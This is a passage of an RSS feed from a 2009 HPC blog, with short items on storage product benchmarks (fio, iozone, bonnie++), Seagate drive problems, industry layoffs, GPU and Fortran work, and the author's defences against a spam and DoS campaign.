      <pubDate>Tue, 10 Mar 2009 00:33:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/dont-know-why-this-is-the-case/</guid>
      <description>As part of the toolchain for JackRabbit and ΔV, we depend upon Perl and various Perl modules. Previously, for DragonFly&amp;rsquo;s prior incarnation, we built our own toolchain. The issue is that the Perl distributed with RHEL/Centos, Debian/Ubuntu usually includes some &amp;hellip; er &amp;hellip; ill-advised patches. We had built our own in the past, and it suited us well, as it felt faster. Well, for a number of reasons we are back at it.</description>
    </item>
    
    <item>
      <title>Day Job: Think Smart! Academic &amp; Research Stimulus Sale</title>
      <link>https://blog.scalability.org/2009/03/day-job-think-smart-academic-research-stimulus-sale/</link>
      <pubDate>Mon, 02 Mar 2009 21:16:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/03/day-job-think-smart-academic-research-stimulus-sale/</guid>
      <description>Tis the season for sales &amp;hellip; this one targeted at academia/research &amp;hellip; See the link for details. JackRabbit, our tightly coupled processing and storage system that unabashedly dominates performance among units of similar density, at a much lower price point, lowers that price point even more for research/education/academic customers. You can get a 48 TB raw JackRabbit unit which as we have noted before, sustains 1.57 GB/s on writes, and 1.</description>
    </item>
    
    <item>
      <title>Starting to play with git</title>
      <link>https://blog.scalability.org/2009/02/starting-to-play-with-git/</link>
      <pubDate>Sun, 01 Mar 2009 04:25:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/starting-to-play-with-git/</guid>
      <description>Been a mercurial user for a while, mercurial was IMO more mature when we started using it about 1.5 years ago. Git was new, and not quite as easy to deal with. What a difference 1.5 years make. I find starting/importing new projects with Mercurial harder than I like. Its not bad, it just takes a bit more thinking than I want during import. So I tried git tonight. Imported the deltaV tools in.</description>
    </item>
    
    <item>
      <title>The hard part about hiring ...</title>
      <link>https://blog.scalability.org/2009/02/the-hard-part-about-hiring/</link>
      <pubDate>Sat, 28 Feb 2009 05:24:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/the-hard-part-about-hiring/</guid>
      <description>&amp;hellip; is in not knowing if the people are able to do what you need them to do. So far, I can say I have found (and kept) one great person. I haven&amp;rsquo;t been too successful at finding good HPC people otherwise.
I was saddened to hear that a friend had been let go of his employer. I suggested considering us. And up until yestereday, I was under the impression I had my next great person.</description>
    </item>
    
    <item>
      <title>Upped sustained speeds on new JackRabbit unit</title>
      <link>https://blog.scalability.org/2009/02/upped-sustained-speeds-on-new-jackrabbit-unit/</link>
      <pubDate>Wed, 25 Feb 2009 04:45:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/upped-sustained-speeds-on-new-jackrabbit-unit/</guid>
      <description>I forgot to mention this. Odd. Our updated JackRabbit (JR4 f.k.a JRM) unit being burnt in over the last few days for a customer. Putting obscene loads on it. Trying hard to crash it. Really.
From fio (apart from the 4M buffer size issue, I really like fio)
streaming-write: (groupid=0, jobs=1): err= 0: pid=12270 write: io=6,397GiB, bw=1,498MiB/s, iops=365, runt=4479113msec clat (msec): min=1, max=4,560, avg= 2.73, stdev=10.33 bw (KiB/s) : min= 0, max=2427840, per=101.</description>
    </item>
    
    <item>
      <title>Security in the cloud</title>
      <link>https://blog.scalability.org/2009/02/security-in-the-cloud/</link>
      <pubDate>Wed, 25 Feb 2009 03:10:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/security-in-the-cloud/</guid>
      <description>I don&amp;rsquo;t mean to rain on anyone&amp;rsquo;s cloud (ok &amp;hellip; ok &amp;hellip; been wanting to say that &amp;hellip; ), but the double whammy of Google&amp;rsquo;s GMail and now zero-day phishing attack starts begging some serious questions of risk and security in &amp;ldquo;the cloud&amp;rdquo;. Ok, I know, there are many different clouds. Ones within a firewall and local to a campus, ones external to a firewall or at a remote campus. There are SaaS, PaaS, and-any-other-letter-you-wish-aaS type apps.</description>
    </item>
    
    <item>
      <title>Finally ...</title>
      <link>https://blog.scalability.org/2009/02/finally/</link>
      <pubDate>Wed, 25 Feb 2009 02:17:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/finally/</guid>
      <description>&amp;hellip; the day job accepts credit cards (Visa, MC, AMEX) directly. A long &amp;hellip; long &amp;hellip; time ago, I was critical of one of my former employers for not doing this &amp;hellip; pointing out that we had lost sales as a result of it. I do not believe in erecting barriers to users buying what we sell. I want to streamline the processes and make them easier. Faster. Better.
We are working very hard at getting a better web-store up (I have seen the new one and it is good) so that our customers can order Delta-V&amp;rsquo;s, JackRabbits, Pegasus and Pegasus-GPU systems online as simple as a few mouse clicks (and some credit card information).</description>
    </item>
    
    <item>
      <title>Updated JackRabbit M bonnie data</title>
      <link>https://blog.scalability.org/2009/02/updated-jackrabbit-m-bonnie-data/</link>
      <pubDate>Tue, 24 Feb 2009 00:02:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/updated-jackrabbit-m-bonnie-data/</guid>
      <description>Continuing a previous thread, here is data from a recent RAID6 JackRabbit test. This is a 24 bay, 24 TB machine, with 64 GB ram, 8 processor cores, 1x DDR IB port, 2x GbE.
[root@jackrabbit ~]# iozone -s 32g -r 2048 -t 4 -F /big/f.0 /big/f.1 /big/f.2 /big/f.3 Iozone: Performance Test of File I/O Version $Revision: 3.315 $ Compiled for 64 bit mode. Build: linux Contributors:William Norcott, Don Capps, Isom Crawford, Kirby Collins Al Slater, Scott Rhine, Mike Wisner, Ken Goss Steve Landherr, Brad Smith, Mark Kelly, Dr.</description>
    </item>
    
    <item>
      <title>&#34;Top HPC trends&#34; ... or are they?</title>
      <link>https://blog.scalability.org/2009/02/top-hpc-trends-or-are-they/</link>
      <pubDate>Mon, 23 Feb 2009 12:03:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/top-hpc-trends-or-are-they/</guid>
      <description>John West at InsideHPC.com links to an article I read last week and didn&amp;rsquo;t comment on. In this article David Driggers, CTO at Verari, points out what he believes to be the top 5 trends in HPC. In no particular order, he points out that CAS (content addressable storage) is &amp;ldquo;breakthrough technology&amp;rdquo; for archiving. Which is odd. In that industry insiders appear to have a somewhat different opinion on thevalue of CAS for archiving.</description>
    </item>
    
    <item>
      <title>on the test track</title>
      <link>https://blog.scalability.org/2009/02/on-the-test-track/</link>
      <pubDate>Sat, 21 Feb 2009 18:41:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/on-the-test-track/</guid>
      <description>One of the issues often raised in discussions with users are IOP performance of JackRabbit. We have measured our 24 bay unit performance at a bit more than 5000 IOPs (8k random reads, as closely matching a test case handed to us by a customer looking at a competitive box, which scored under 4300 IOPs on the same test). The problem is that getting consistent workable tools to do this measurement is hard &amp;hellip; windows users use IOmeter, other users will use SPC-1 and related.</description>
    </item>
    
    <item>
      <title>Quick set of new JR4 (renamed JRM) bonnie&#43;&#43; numbers</title>
      <link>https://blog.scalability.org/2009/02/quick-set-of-new-jr4-renamed-jrm-bonnie-numbers/</link>
      <pubDate>Fri, 20 Feb 2009 18:32:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/quick-set-of-new-jr4-renamed-jrm-bonnie-numbers/</guid>
      <description>New firmware on controllers, new drivers, still haven&amp;rsquo;t worked all the tuning out perfectly yet, but getting there.
[root@&amp;lt;a href=&amp;quot;http://scalableinformatics.com/jackrabbit&amp;quot;&amp;gt;jackrabbit&amp;lt;/a&amp;gt; ~]# bonnie++ -u root -d /raid60 -f Using uid:0, gid:0. Writing intelligently...done Rewriting...done Reading intelligently...done start &#39;em...done...done...done...done...done... Create files in sequential order...done. Stat files in sequential order...done. Delete files in sequential order...done. Create files in random order...done. Stat files in random order...done. Delete files in random order...done. Version 1.94 ------Sequential Output------ --Sequential Input- --Random- Concurrency 1 -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP jackrabbit 124G 887738 98 285392 46 1182583 96 417.</description>
    </item>
    
    <item>
      <title>Been super busy ...</title>
      <link>https://blog.scalability.org/2009/02/been-super-busy/</link>
      <pubDate>Fri, 20 Feb 2009 18:30:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/been-super-busy/</guid>
      <description>&amp;hellip; with orders, support, coding, customer visits, proposals &amp;hellip; Will resume posting again shortly &amp;hellip;</description>
    </item>
    
    <item>
      <title>Seagate announces Constellation drives ... on their web site ...</title>
      <link>https://blog.scalability.org/2009/02/seagate-announces-constellation-drives-on-their-web-site/</link>
      <pubDate>Mon, 16 Feb 2009 16:12:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/seagate-announces-constellation-drives-on-their-web-site/</guid>
      <description>Seagate has created a new line of drives, named Constellation. Spec&amp;rsquo;s look good, capacities up to 2TB on 3.5&amp;quot; version. SAS v2 (6.0 Gbps) as well as SATA. As soon as we can get our hands on these, we will start working on qualifying them for JackRabbit and ΔV. 96TB in 5U, 48TB in 4U, 32TB in 3U, 24TB in 2U.</description>
    </item>
    
    <item>
      <title>Open Source Venture Capital by Mark Cuban</title>
      <link>https://blog.scalability.org/2009/02/open-source-venture-capital-by-mark-cuban/</link>
      <pubDate>Thu, 12 Feb 2009 01:47:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/open-source-venture-capital-by-mark-cuban/</guid>
      <description>Maybe we should pitch? I dunno (we are looking for capital to grow and hire people &amp;hellip; go figure). Here is his post. His criteria are simple, and quite good:
That is, for him to invest, you have to open your idea up. If it is defensible, and you have a shot, he might sign on. However, he might not. How is this different from the VC meet/greet events that you have to pay $1000+ for, in order to present your idea to &amp;ldquo;funders&amp;rdquo;?</description>
    </item>
    
    <item>
      <title>GPU-HMMer press release out ... with a pointer to our new Pegasus-GPU product</title>
      <link>https://blog.scalability.org/2009/02/gpu-hmmer-press-release-out-with-a-pointer-to-our-new-pegasus-gpu-product/</link>
      <pubDate>Thu, 05 Feb 2009 02:50:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/gpu-hmmer-press-release-out-with-a-pointer-to-our-new-pegasus-gpu-product/</guid>
      <description>As usual, Doug works his magic, comes through in a pinch. See our link. GPU-HMMer measurements giving about 100x on 3 GPUs over a Shanghai AMD processor that forms the computing substrate for the GPUs. But we are also point to Pegasus-GPU, which is our new GPU box powered by Tesla GPUs from NVIDIA. We should have pictures up soon (unit is in lab, glowing a faint blue &amp;hellip;). Data sheets, product sheets and &amp;hellip; wait for it &amp;hellip; online ordering &amp;hellip; coming very shortly.</description>
    </item>
    
    <item>
      <title>Buying a JackRabbit ...  $X.  Inability of Paypal to process payments ...  Priceless ...</title>
      <link>https://blog.scalability.org/2009/02/jackrabbit-x-inability-of-paypal-to-process-payments-priceless/</link>
      <pubDate>Tue, 03 Feb 2009 18:33:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/jackrabbit-x-inability-of-paypal-to-process-payments-priceless/</guid>
      <description>We are shopping for a new merchant services provider thanks in part to Paypal and its rather annoying rules. Like not being able to process transactions over $10k USD. Oh sure, they could do it if they wanted to &amp;hellip; but they don&amp;rsquo;t want to. Ask them, and they will tell you that it is against Federal law. Thats what they told me a while ago. Ask Paymentech or Authorize.net and you will hear something different.</description>
    </item>
    
    <item>
      <title>um ... er ... don&#39;t go there ... please ...</title>
      <link>https://blog.scalability.org/2009/02/um-er-dont-go-there-please/</link>
      <pubDate>Tue, 03 Feb 2009 14:02:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/02/um-er-dont-go-there-please/</guid>
      <description>This isn&amp;rsquo;t a politcal blog, and this isn&amp;rsquo;t a political post. This is a blog about HPC, and the business of HPC. Which is global. Which means that HPC is impacted by political winds as surely as the political winds themselves blow. Most of the time we can ignore it. Some of the time, bad ideas emerge. John West at InsideHPC.com pointed out some of the rhetoric circling about the massive spending bill under consideration in the US government.</description>
    </item>
    
    <item>
      <title>SGE list appears to be broken</title>
      <link>https://blog.scalability.org/2009/01/sge-list-appears-to-be-broken/</link>
      <pubDate>Sat, 31 Jan 2009 23:29:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/sge-list-appears-to-be-broken/</guid>
      <description>Can&amp;rsquo;t post from my email account, the one subscribed to, and receiving SGE email. Claims I am not subscribed. Ok. Then I try from the gmail account. Accepts my subscription. And then doesn&amp;rsquo;t let me respond. Borked mailing lists are no fun. I screwed up the mpihmmer list for a while (by accident) without realizing it. Fixing them is even less fun (mailman is &amp;hellip; well &amp;hellip; a multi-cup-of-coffee-diagnostic-event) Hopefully someone will ping the list admins to investigate.</description>
    </item>
    
    <item>
      <title>OT:  Ramping up spam protection</title>
      <link>https://blog.scalability.org/2009/01/ot-ramping-up-spam-protection/</link>
      <pubDate>Sat, 31 Jan 2009 22:02:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/ot-ramping-up-spam-protection/</guid>
      <description>I have been displeased with the massive upswing in spam, and not looking forward to 30-40k spam messages next month. So I did some research on the additional features of our MTA, and then did some analysis of the spam we had. With a few quick changes, focusing on where/from whom we were getting the most spam, I instituted and tested some additional filter elements.
If you get caught in this filter and need to let me know, contact me through gmail.</description>
    </item>
    
    <item>
      <title>On dynamical systems and climatology</title>
      <link>https://blog.scalability.org/2009/01/on-dynamical-systems-and-climatology/</link>
      <pubDate>Sat, 31 Jan 2009 16:35:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/on-dynamical-systems-and-climatology/</guid>
      <description>That all of these are modeled on HPC gives me the tie-in to HPC that we need. I think we need more theoretical development, modeling, and model refinement. HPC systems accord us virtual laboratories that allow us to create and probe state spaces that may be impossible to consider in an experimental sense otherwise. And this is, IMO, where we need to spend more time/effort/cycles.
Sadly we have political views impinging into scientific research, and this is problematic.</description>
    </item>
    
    <item>
      <title>Do more.  Spend less.</title>
      <link>https://blog.scalability.org/2009/01/do-more-spend-less/</link>
      <pubDate>Wed, 28 Jan 2009 22:09:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/do-more-spend-less/</guid>
      <description>This has become our mantra. There is a nice article in The Economist about this. While JackRabbit provides best of breed performance for what it does, and it also costs less than other solutions. Quite a bit less in most cases. While we are hearing, from customers and users, of &amp;ldquo;orders of magnitude&amp;rdquo; better performance (their words &amp;hellip; multiple customers) than competitive boxes, we are emphasizing less stress on the budget aspect.</description>
    </item>
    
    <item>
      <title>48TB ΔV4 for about $18k USD</title>
      <link>https://blog.scalability.org/2009/01/48tb-v4-for-about-18k-usd/</link>
      <pubDate>Wed, 28 Jan 2009 21:40:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/48tb-v4-for-about-18k-usd/</guid>
      <description>Just ran through the configuration pricing model on it. 48TB ΔV4 came out around $18k USD. Add in a dual port 10GbE NIC for $500, and you have a seriously awesome iSCSI target box (not to mention a very very fast NFS / CIFS box). Wow. We are refreshing/updating our ΔV line for 1Q2009, so expect some new pricing bits soon.</description>
    </item>
    
    <item>
      <title>96TB in 5U: coming soon to a JackRabbit near you</title>
      <link>https://blog.scalability.org/2009/01/96tb-in-5u-coming-soon-to-a-jackrabbit-near-you/</link>
      <pubDate>Tue, 27 Jan 2009 05:13:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/96tb-in-5u-coming-soon-to-a-jackrabbit-near-you/</guid>
      <description>Engadget is reporting (thanks Andrew!) that 2TB drives are about to ship from Western Digital. In the face of Seagate&amp;rsquo;s &amp;hellip; er &amp;hellip; firmware issues I think we are going to see Western Digital drives in JackRabbit&amp;rsquo;s soon as a standard option.
Not sure if these are enterprise drives going on sale (not likely, betting they are consumer drives), but we have customers that want these. 48 of these in 5U.</description>
    </item>
    
    <item>
      <title>About to pass a dubious milestone ...</title>
      <link>https://blog.scalability.org/2009/01/about-to-pass-a-dubious-milestone/</link>
      <pubDate>Mon, 26 Jan 2009 23:00:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/about-to-pass-a-dubious-milestone/</guid>
      <description>[update: 8:49am 27-Jan-2009] Yup &amp;hellip; my spam-box is at 20012 and counting. [update 2: 8:29am 31-Jan-2009] 25188 and counting &amp;hellip; wassamatta, they couldn&amp;rsquo;t get me to 30k by the end of the month (16 hours away)? Sheesh &amp;hellip; On a positive note, Thunderbird is able to handle 25188 email sized box without problem. I remember when 1000 emails would give email clients fits &amp;hellip; Our spam filter is a pipeline. It can handle quite a load &amp;hellip; we have been email bombed before, and far from causing the server conniptions, it handles it quite well.</description>
    </item>
    
    <item>
      <title>Pulling no punches:  Firefox 3.x sucks</title>
      <link>https://blog.scalability.org/2009/01/pulling-no-punches-firefox-3x-sucks/</link>
      <pubDate>Sat, 24 Jan 2009 16:21:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/pulling-no-punches-firefox-3x-sucks/</guid>
      <description>Having used it, watched it crash, hog memory, stall, screw up rendering, &amp;hellip; I have to wonder exactly what the Mozilla corporation is thinking by releasing this stinking pile of bits. My laptop is a dual core Intel machine with 2.5 GB ram, and a fast 7200 RPM SATA drive. And it is brought to its knees by firefox 3.0. A third of ram gets snarfed by it immediately upon running.</description>
    </item>
    
    <item>
      <title>An &#34;ouch&#34; moment</title>
      <link>https://blog.scalability.org/2009/01/an-ouch-moment/</link>
      <pubDate>Thu, 22 Jan 2009 18:12:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/an-ouch-moment/</guid>
      <description>/. indicated that as of this moment, Redhat is worth more (higher market capitalization) than Sun. So I checked it out. As of this writing, RHT has a market cap of $2.62B, with $0.76B cash on hand. This suggests that the company has a value exclusive of cash, of about $1.9B. Not bad for a company that doesn&amp;rsquo;t actually make the technology behind its core product offerings. As of this writing, JAVA has a market cap of $2.</description>
    </item>
    
    <item>
      <title>The RIFs continue:  now the bigger players in HPC</title>
      <link>https://blog.scalability.org/2009/01/the-rifs-continue-now-the-bigger-players-in-hpc/</link>
      <pubDate>Thu, 22 Jan 2009 15:45:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/the-rifs-continue-now-the-bigger-players-in-hpc/</guid>
      <description>News (I guess not unexpected) this morning is that Microsoft is cutting staff, Intel is closing down underutilized resources and cutting staff, IBM is cutting staff, and we heard yesterday from John at InsideHPC.com of more cuts at AMD. Having been on the wrong end of RIFs before, I know what it is like. I empathize with those effected. Having run a company for 6+ years, I know the abject terror of the other side of this.</description>
    </item>
    
    <item>
      <title>Things you should never do to a customers&#39; machine/disk: Part 10, bricking a drive</title>
      <link>https://blog.scalability.org/2009/01/things-you-should-never-do-to-a-customers-machinedisk-part-10-bricking-a-drive/</link>
      <pubDate>Wed, 21 Jan 2009 13:04:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/things-you-should-never-do-to-a-customers-machinedisk-part-10-bricking-a-drive/</guid>
      <description>Ouch. We test our JackRabbit and Delta-V (ΔV) units extensively &amp;hellip; long burn-in times, after any firmware updates. We like to run into the problems in-lab as compared to in-field. Some customers get annoyed at what they perceive to be slow shipping, but we want to know, when it leaves our lab, that this machine, and all its parts, works.
It appears that Seagate is having an issue with this last bit.</description>
    </item>
    
    <item>
      <title>Nail, hammer, hit hit hit!</title>
      <link>https://blog.scalability.org/2009/01/nail-hammer-hit-hit-hit-2/</link>
      <pubDate>Tue, 20 Jan 2009 05:04:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/nail-hammer-hit-hit-hit-2/</guid>
      <description>John West has a great commentary at InsideHPC.com. First I recommend, if you haven&amp;rsquo;t read it, by all means, read it. He points out that Addison Snell (a former colleague during SGI days) stands by his HPC spending/market analysis of several months ago. Further, he notes something I saw in another press release recently, that indicates that financial services firms are remaining committed to HPC.
John&amp;rsquo;s summary of Tabor&amp;rsquo;s results notes that purchases may be deferred or placed on hold.</description>
    </item>
    
    <item>
      <title>Day job has a sale!</title>
      <link>https://blog.scalability.org/2009/01/day-job-has-a-sale/</link>
      <pubDate>Sun, 18 Jan 2009 03:02:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/day-job-has-a-sale/</guid>
      <description>Doug has worked his magic, and turned our &amp;hellip; er &amp;hellip; aggressively cold weather, into a sales tool. We are having a 10% off sale. Details here. Yesterday, when I drove into work, the car thermometer registered -18F. Yup. Thats right. Should be warming up soon though. I hear we might crack 10 degrees . On the + side of 0. Soon. Meanwhile, shoveling snow was &amp;hellip; er &amp;hellip; fun &amp;hellip; (not!</description>
    </item>
    
    <item>
      <title>Working on Cuda&#43;Fortran</title>
      <link>https://blog.scalability.org/2009/01/working-on-cudafortran/</link>
      <pubDate>Sun, 18 Jan 2009 02:55:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/working-on-cudafortran/</guid>
      <description>So we have something like 5 different Cuda capable machines in the company. My laptop, an older Quadro FX 1400 based Opteron 275 based machine, a GeForce 8800 based machine, a dual GTX260 based machine, and a Tesla machine with 3 GPUs. The latter is to be our new desk(side|top) personal supercomputer offering. Pegasus-(I|A)(3|4)G. Complex .. dealing with case/PS issues now &amp;hellip; rest of it works fine. Current unit is powered by a Shanghai pair which we are testing with.</description>
    </item>
    
    <item>
      <title>stretching my (g)fortran legs ...</title>
      <link>https://blog.scalability.org/2009/01/stretching-my-gfortran-legs/</link>
      <pubDate>Sun, 18 Jan 2009 00:56:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/stretching-my-gfortran-legs/</guid>
      <description>Working on a quick project for a partner. I haven&amp;rsquo;t done much fortran programming in the last few years, mostly C, Perl, and a few other things. Its been a while, but now I am remembering why I disliked multi-language programming in the past. You have to fight with the linkers (and compilers) to get them to do the right thing. Stuff that should &amp;ldquo;just work&amp;rdquo; doesn&amp;rsquo;t.
I really, really, just want to call c_Function(argument1, argument2, .</description>
    </item>
    
    <item>
      <title>ummm.... er ..... uh .... oh ....</title>
      <link>https://blog.scalability.org/2009/01/ummm-er-uh-oh/</link>
      <pubDate>Sat, 17 Jan 2009 04:45:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/ummm-er-uh-oh/</guid>
      <description>Seagate appears to be having an issue. A fairly large number of drive models, recent models, both enterprise and desktop, appear to have some serious failure issues. We have been using Seagates for a while, they have been reliable. We have seen a higher failure rate than they report, but we chalked that up to a assuming Seagate marketing using a somewhat optimistic interpretation of test result statistics. Call it a mis-set calibration point.</description>
    </item>
    
    <item>
      <title>... and the 3 GPU Pegasus unit with Shanghai CPUs is up</title>
      <link>https://blog.scalability.org/2009/01/and-the-3-gpu-pegasus-unit-with-shanghai-cpus-is-up/</link>
      <pubDate>Fri, 16 Jan 2009 00:04:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-the-3-gpu-pegasus-unit-with-shanghai-cpus-is-up/</guid>
      <description>mwhahaha!!!! Cuda goodness. Will get updated GPU-HMMer data with real C1060s.</description>
    </item>
    
    <item>
      <title>... and Joe messes up mailman aliases ... D&#39;oh!</title>
      <link>https://blog.scalability.org/2009/01/and-joe-messes-up-mailman-aliases-doh/</link>
      <pubDate>Thu, 15 Jan 2009 12:35:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-joe-messes-up-mailman-aliases-doh/</guid>
      <description>Yeah &amp;hellip; I did just nuke my own email server for about 30 minutes. My bad. All better (no really, all better!).</description>
    </item>
    
    <item>
      <title>... and Rackable trims ...</title>
      <link>https://blog.scalability.org/2009/01/and-rackable-trims/</link>
      <pubDate>Wed, 14 Jan 2009 21:34:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-rackable-trims/</guid>
      <description>Rackable, which does do some HPC, is trimming down.</description>
    </item>
    
    <item>
      <title>... and Satyam imploded last week</title>
      <link>https://blog.scalability.org/2009/01/and-satyam-imploded-last-week/</link>
      <pubDate>Wed, 14 Jan 2009 16:59:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-satyam-imploded-last-week/</guid>
      <description>While not HPC related, we live in a non-ivory tower world. Satyam is one of the large Indian outsourcing firms. Last week, the founding brothers admitted to serious irregularities and fraud. This week the Indian government is moving swiftly to try to contain the damage.
The relation to HPC comes through other Indian outsourcing providers such as Tata and Wipro, both of whom have HPC efforts underway. This scandal should not impact them, though it could partially undermine confidence in this business model.</description>
    </item>
    
    <item>
      <title>... and Nortel files for Chapter 11 protection</title>
      <link>https://blog.scalability.org/2009/01/and-nortel-files-for-chapter-11-protection/</link>
      <pubDate>Wed, 14 Jan 2009 16:50:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/and-nortel-files-for-chapter-11-protection/</guid>
      <description>See this link at Yahoo. We have lots of customers with Nortel switches. We don&amp;rsquo;t use them that much, but others have. I don&amp;rsquo;t expect this to be the last to file for protection, by any stretch of the imagination.</description>
    </item>
    
    <item>
      <title>Seagate 10% RIF</title>
      <link>https://blog.scalability.org/2009/01/seagate-10-rif/</link>
      <pubDate>Mon, 12 Jan 2009 15:43:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/seagate-10-rif/</guid>
      <description>As seen on Barrons. CEO Watkins is out, replaced with Stephen Luczo. Seagate makes good disk drives, and drive prices have been hammered in recent weeks. Pricing went into something near a free-fall over the last 6 weeks. While this is good for JackRabbit and ΔV customers, it is bad for drive manufacturers that have to show a sustained profit. Seagate is reporting that it had a bad December, and as many other technological based product outfits have as well, I think this may be the first of many such announcements.</description>
    </item>
    
    <item>
      <title>HPC Virtualization</title>
      <link>https://blog.scalability.org/2009/01/hpc-virtualization/</link>
      <pubDate>Mon, 12 Jan 2009 13:47:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/hpc-virtualization/</guid>
      <description>John at InsideHPC.com has a discussion going on HPC virtualization. Basically John&amp;rsquo;s point is that programmer/user time is more valuable than machine raw power. And that while VMs pull down performance, machine utilization is so low to begin with, that it doesn&amp;rsquo;t matter.
I don&amp;rsquo;t disagree that machine utilization is low, nor do I disagree that VMs will impact performance. I don&amp;rsquo;t dispute that programmer/user time is important. The issue I keep running into is the quality of compiler generated code.</description>
    </item>
    
    <item>
      <title>DoS update:  Its over, and I have some nice new tools to help stop them</title>
      <link>https://blog.scalability.org/2009/01/dos-update-its-over-and-i-have-some-nice-new-tools-to-help-stop-them/</link>
      <pubDate>Mon, 12 Jan 2009 13:22:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/dos-update-its-over-and-i-have-some-nice-new-tools-to-help-stop-them/</guid>
      <description>Basically someone decided to fire off many emails to us. Their effort was from some team of bots (ToB), and came largely from the .ru domain. I wrote some quick and dirty tools to scan our logs, and generate a hash table of IP addresses, and plugged this into a smtpd client filter. So after the first few failed emails, we have the bot&amp;rsquo;s signature. And we can reject future emails from them, even for a short period of time.</description>
    </item>
    
    <item>
      <title>on the DoS going on against our mail system ...</title>
      <link>https://blog.scalability.org/2009/01/on-the-dos-going-on-against-our-mail-system/</link>
      <pubDate>Sun, 11 Jan 2009 20:40:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/on-the-dos-going-on-against-our-mail-system/</guid>
      <description>Yes, someone with lots of machines in a .ru domain, is trying to send us lots of spam. Trying a DoS, but I don&amp;rsquo;t think its working all that well. But what is troubling to me is that several of the machines listed give .army.mil addresses. Which, if they aren&amp;rsquo;t forged, says something profoundly bad about security on our armed forces machines. Sure, they could be little spambots. Imagine if they were more than little spambots.</description>
    </item>
    
    <item>
      <title>Look for a future writeup of using SSE2, Cuda, and regular old coding</title>
      <link>https://blog.scalability.org/2009/01/look-for-a-future-writeup-of-using-sse2-cuda-and-regular-old-coding/</link>
      <pubDate>Sun, 11 Jan 2009 17:35:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/look-for-a-future-writeup-of-using-sse2-cuda-and-regular-old-coding/</guid>
      <description>I thought there might be some interest in this, given some of the posts we have done last year. If I hit article length (suspect I will), then I&amp;rsquo;ll submit it for publication. As a teaser, the baseline version of rzf for arguments -l 1000000000 -n 2 takes 34.83s on my laptop CPU, while the SSE2 version of the same code takes 7.62s. As this is a Cuda enabled laptop, I intend to get this version going as well shortly.</description>
    </item>
    
    <item>
      <title>First tests with btrfs on ΔV3</title>
      <link>https://blog.scalability.org/2009/01/first-tests-with-btrfs-on-v3/</link>
      <pubDate>Fri, 09 Jan 2009 03:51:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/first-tests-with-btrfs-on-v3/</guid>
      <description>[мебелиBtrfs](http://btrfs.wiki.kernel.org/index.php/Main_Page) is new file system being developed. GPL licensed, this is what the page notes:</description>
    </item>
    
    <item>
      <title>WTH?  Linux software doing the &#34;bloat thing&#34;?</title>
      <link>https://blog.scalability.org/2009/01/wth-linux-software-doing-the-bloat-thing/</link>
      <pubDate>Thu, 08 Jan 2009 23:41:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/01/wth-linux-software-doing-the-bloat-thing/</guid>
      <description>From a top screen output &amp;hellip; on my laptop:
top - 18:43:01 up 1:06, 2 users, load average: 1.19, 1.36, 1.17 Tasks: 178 total, 3 running, 175 sleeping, 0 stopped, 0 zombie Cpu0 : 11.9%us, 3.0%sy, 0.0%ni, 84.2%id, 0.0%wa, 1.0%hi, 0.0%si, 0.0%st Cpu1 : 76.2%us, 5.0%sy, 0.0%ni, 17.8%id, 0.0%wa, 0.0%hi, 1.0%si, 0.0%st Mem: 2571704k total, 1640064k used, 931640k free, 36796k buffers Swap: 995988k total, 0k used, 995988k free, 476952k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 7367 landman 20 0 1374m 541m 39m S 57 21.</description>
    </item>
    
    <item>
      <title>Cluster 10GbE:  still in the future</title>
      <link>https://blog.scalability.org/2009/01/cluster-10gbe-still-in-the-future/</link>
